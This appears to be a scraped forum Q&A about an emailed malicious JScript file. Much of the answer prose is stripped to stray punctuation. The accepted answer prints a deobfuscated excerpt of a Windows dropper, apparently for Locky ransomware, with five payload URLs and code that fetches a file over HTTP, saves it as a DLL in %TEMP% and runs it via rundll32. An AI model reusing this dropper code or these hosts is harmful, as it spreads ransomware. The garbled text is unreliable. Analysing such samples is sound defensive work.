Trying to decode a scam script result

Question

Trying to decode a scam script result

Someone sends JS files, trying to try to lure me (and, presumably, others) into running the file and endanger their system.

Thing is, I have a Mac, and looking at this code doesn't seem useful on a Mac. As a JavaScript developer, I’m not quite sure how useful it is, even on a Windows computer.

The code is too big to post here, so I posted it on GitHub:

https://gist.github.com/anonymous/dfead201c8e5dc48f98548d0bdb7ac26

What does this code do?

I ran it in the sandbox and this resulted in a console error.

+4

javascript malware

Phillip berger Aug 27 '16 at 0:39

source share

3 answers

, wscript, Windows , , Windows, : P

2 , eval, - , , , var Q1, eval console.log. js, , , , . , jts-prettifier, , , LOL, .

, , xD

: , jsfiddle , - ..

Edit2:

!

https://jsfiddle.net/3sn6o9o9/

. js, , , !

+2

seahorsepip 27 . '16 0:51

: . DLL URL-, ( XOR PRNG), rundll32 ( ). DLL Locky.

+1

Alexander.K.Polyakov 28 . '16 6:32

source share

Dekel · Accepted Answer · 2016-08-27T02:04:01+0000

, ( ), 600 ;).

- script ( ) : http://pastebin.com/cFuijfFS

- :

var IGv7=[Yc+Hu1+Yq8+Jj+KFg2+Ka6+Hk+OHi6+ULs4+EBb, Tj4 + Dk7+Pc2+Hj8+As + YXv5+TIk0+Rj+Kb3+NZa2+DVq+Vx+KIi+Yh4 + XTc5+NHe3+Pv6+ATm5, Tj4 + Dk7+Gl+QLu+Pr+KIi+So+Af1+Nu + Zz+Kb + Zn1+Ik+Vy4, Yc+It+Nd+Ty+Lc+DFu+Lf4+LEa4+Zh1 + Kc+LSk+Tu6, Vg7 + Tp7+AUi+OPo + Oi+NGu8+DXl1+Px9 + Fa + Js9+KPm];
// var IGv7=["http://econopaginas.com/kudrd", "http://baer-afc2.homepage.t-online.de/4yhgvna", "http://jhengineering.szm.com/on9wjn", "http://otwayorchard.net/eo240k", "http://rejoincomp2.in/1tdqo6"]

var Xl3=WScript[Sk6 + STd1 + Jz + GNu0](Zn4 + ALt + Qs8 + UQw);
// Xl3=WScript["CreateObject"]("WScript.Shell");
// Lets say X13 == SHELL

var XWe=Xl3.ExpandEnvironmentStrings(ZFq + YMy6);
// var XWe=SHELL.ExpandEnvironmentStrings("%TEMP%/")

var NQf6=XWe + Vm0 + LCo + Bp + Ty0;
// var NQf6=C:/TEMP/XfZn0ghPqqlucK

var Nt5=NQf6 + Aq4 + FQn5;
// var Nt5="C:/TEMP/XfZn0ghPqqlucK.dll"

var Vu = Xl3.Environment(Cf8 + EMb);
// var Vu = C:/system

// PUb + YZg2 + BMc + Bs8 + DEa + HSu1 + Db4 == "PROCESSOR_ARCHITECTURE"
if (Vu(PUb + YZg2 + BMc + Bs8 + DEa + HSu1 + Db4).toLowerCase() == "amd64")
{
    // Check if we are in amd64
    var UFn4 = Xl3.ExpandEnvironmentStrings(OMi0);

    // var UFn4 = "%SystemRoot%\SysWOW64\rundll32.exe"
}
else
{
    var UFn4 = Xl3.ExpandEnvironmentStrings(DCx);
    // var UFn4 = "%SystemRoot%\system32\rundll32.exe"
}
... 
var SPz0=[WQp1 + WCl1 + TYr1 + Np, Wd + CMz6 + Ey7 + GXj + Kk2 + Fb8 + POy1];
// SPz0=["MSXML2.XMLHTTP", "WinHttp.WinHttpRequest.5.1"]

// Try to create the XMLHTTP object
for (var Lp9=0; Lp9 < SPz0[ETi8 + Fp]; Lp9++)
{
    try 
    {
        var MBi0=WScript[Sk6 + STd1 + Jz + GNu0](SPz0[Lp9]);
        break;
    }
    catch (e)
    {
        continue;
    }
};

var OPr3 = "";
// FIj2 + HOf + LBa1 + ZJo + MPr8 + Az + DZx6 == "Scripting.FileSystemObject"
var fso = new ActiveXObject(FIj2 + HOf + LBa1 + ZJo + MPr8 + Az + DZx6);


var MTm6 = uheprng(Math.random().toString());
var ENa6=1;
do
{
    // Check ACTIVEXOBJECT_FileSystemObject[FileExists](dll file from before)
    if (fso[DQq + Js + Va + Vn](Nt5))
    {
        var Em = fso.GetFile(Nt5);
        var DAb4 = Em.ShortPath;
        OPr3 = DAb4+ZYz;

        // check if the same dll file with ".txt" extension exists
        if (fso[DQq + Js + Va + Vn](OPr3)) {
            // run quite()
            this[Dv + Dx + Go7][Jh + Nz3](824 - 824);
        }
    }

    var HFw3 = MTm6(IGv7[ETi8 + Fp]);

    try
    {
        if (1== ENa6)
        {
            // Do a GET request to the url "http://jhengineering.szm.com/on9wjn"
            MBi0[NOc6](YRk1 + XWj, IGv7[HFw3++ % IGv7[ETi8 + Fp]], false);
            MBi0[BBw + Co]();
        }

        if (MBi0.readystate < 4) 
        {
            // WScript["Sleep"](100);
            WScript[SJl + Hj](100);

            continue;
        }


        var Nf=WScript[Sk6 + STd1 + Jz + GNu0](YPt6+CXb+Tv0+Da1 + Ng2);
        // var Nf=WScript["CreateObject"]("ADODB.Stream")


        // ADOBE_SCRIPT[open]()
        Nf[NOc6]();

        // ADOBE_SCRIPT[type] = 1
        Nf[Aj9]=Yz; 

        // ADOBE_SCRIPT[write](content from the XMLHTTPRequest we just did)
        Nf[Vr3](MBi0[Nb + Re + HKj + Zk]);

        // Set position of the adodb.stream to 0
        Nf[Hz + QWh5 + VSo5]=0;

        // Save the content to the file NQf6 (the file in c:/temp)
        Nf[WGa + Yh + OAk](NQf6, IDz0);

        // close the file
        Nf[Cz + FLv2]();

, :)

Trying to decode a scam script result

More articles: